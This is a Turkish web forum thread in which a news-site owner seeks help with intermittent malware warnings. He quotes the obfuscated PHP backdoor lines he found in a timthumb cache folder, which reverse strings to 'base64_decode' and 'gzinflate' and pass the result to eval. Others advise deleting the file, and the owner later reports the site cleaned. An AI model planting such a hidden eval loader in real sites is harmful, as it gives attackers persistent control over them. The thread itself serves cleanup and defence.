ozturk
Her daim öğrenci...
Kullanıcı
-
Üyelik
03.01.2012
-
Yaş/Cinsiyet
47 / E
-
Meslek
Her daim öğrenci...
-
Konum
Gaziantep
-
Ad Soyad
F** Ö**
-
Mesajlar
411
-
Beğeniler
80 / 76
-
Ticaret
7, (%100)
Bir haber sitem var. Bu sitede arada sırada
Uyarı: bu sitede yanlış giden birşeyler var gibisinden uyarı çıkıyor. ve çıkan pencerede ybite.osa.pl adresi var. yaklaşık 1,5 gb dosyayı bilgisayara indirip nod32 ile tarattım bişey çıkmadı. bu virüs uyarısı sürekli çıkmıyor. arada sırada çıkıyor. ve en son site daha önceki temasında timthumb.php kullanıyordum. orayı kontrol ederken.. timthumb için varolan cache klasörü içerisinde
external_121a3aa123a12a123a.php gibisinden bir dosya gördüm. içeriği aşağıdaki gibi...
$h6v = strrev('edoced_46esab');
$fJKuN = strrev('etalfnizg');
eval($fJKuN($h6v(implode('',$ZlU))));
?>
decode etmeye çalıştım ama olmadı. bu dosya virüs sebebi olabilir mi... iframe virüsü değil sanırım. öyle olsa footera veya başka bir yere link vs eklenirdi ama yok.
site adresi;
http://www.selcukhaber.com
sizde aynı uyarı çıkacak mı... artı bu sorunun çözümü için ne yapabilirim. yardımcı olacak arkadaşlara şimdiden teşekkürler.
Erzin'in de Haberi Olacak Artık...!
www.erzinhaber.com
-
Üyelik
16.06.2011
-
Yaş/Cinsiyet
42 / E
-
Meslek
-
Konum
-
Ad Soyad
** **
-
Mesajlar
34
-
Beğeniler
4 / 2
-
Ticaret
3, (%100)
kaspersy siteye girişi engelledi trojen var diyor o dosyanın yedeğini al ve sil
ozturk
Her daim öğrenci...
Kullanıcı
-
Üyelik
03.01.2012
-
Yaş/Cinsiyet
47 / E
-
Meslek
Her daim öğrenci...
-
Konum
Gaziantep
-
Ad Soyad
F** Ö**
-
Mesajlar
411
-
Beğeniler
80 / 76
-
Ticaret
7, (%100)
şu an tamamen temizledim sanırım. veritabanı ayar dosyası hariç tüm dosyaları değiştim. image dosya ve klasörlerini de tek tek kendim taradım. bende hata vermiyor. siteye giren arkadaşlardan hata verenler yazarsa sevinirim. herkese teşekkürler...
Erzin'in de Haberi Olacak Artık...!
www.erzinhaber.com
-
Üyelik
16.06.2011
-
Yaş/Cinsiyet
42 / E
-
Meslek
-
Konum
-
Ad Soyad
** **
-
Mesajlar
34
-
Beğeniler
4 / 2
-
Ticaret
3, (%100)
şuanda temiz hata vermiyor
1 kişi bu mesajı beğendi.
-
Üyelik
23.11.2011
-
Yaş/Cinsiyet
31 / E
-
Meslek
öğrenci
-
Konum
İzmir
-
Ad Soyad
Ö** G**
-
Mesajlar
1647
-
Beğeniler
347 / 570
-
Ticaret
8, (%100)
gerçekten çok uyanıkca bi şifreleme yapmışlar.
ozergul.net/com
ozturk
Her daim öğrenci...
Kullanıcı
-
Üyelik
03.01.2012
-
Yaş/Cinsiyet
47 / E
-
Meslek
Her daim öğrenci...
-
Konum
Gaziantep
-
Ad Soyad
F** Ö**
-
Mesajlar
411
-
Beğeniler
80 / 76
-
Ticaret
7, (%100)
İlginiz için çok çook teşekkür ediyorum arkadaşlar. Decode edildi dosya ve uçurdum :) Aynı dosyadan bir kaç yerde daha buldum. El atmadığım yeri kalmadı sitenin. Artı şifreler, tablolar, wp-admin şifrelemesi vs derken güneşin doğuşunu izletti bana. Şu an sorun yok sanıyorum. İlgi ve cevaplar için tekrar teşekkürler...
Erzin'in de Haberi Olacak Artık...!
www.erzinhaber.com
-
Üyelik
18.12.2011
-
Yaş/Cinsiyet
49 / E
-
Meslek
Serbest
-
Konum
Giresun
-
Ad Soyad
Y** U**
-
Mesajlar
994
-
Beğeniler
9 / 303
-
Ticaret
11, (%100)
Dostum rica etsem PHP sürümünü söyleyebilir misin? 5.2.x mi?
Ne ekersen onu biçersin
